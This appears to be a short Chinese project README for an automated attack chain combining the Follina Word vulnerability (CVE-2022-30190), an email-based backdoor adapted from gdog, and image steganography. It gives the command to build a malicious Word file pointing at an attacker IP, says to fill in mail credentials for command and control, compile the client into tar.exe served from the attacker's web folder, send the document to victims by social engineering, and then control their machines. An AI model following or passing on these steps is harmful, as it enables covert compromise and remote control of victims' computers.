一个基于CVE-2022-30190,163邮箱后门,以及图片隐写的自动化攻击链实现。
感谢以下github仓库,我们参考并修改了部分代码,集成实现了我们的工作:
gdog:
follina:
利用follina.py构建恶意word文件,并打开http监听
--ip和--output来指定python follina.py --ip 100.100.100.100 --output maldoc.doc修改gdog下的client.py和gdog.py,填入以下信息
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
将client.py编译成tar.exe置于/follina/www下
使用任意社会工程学方式发送给目标,只要受害者打开了word,就会自动下载tar.exe并执行
攻击者本地运行gdog并发送命令控制目标机器,使用方式参见follina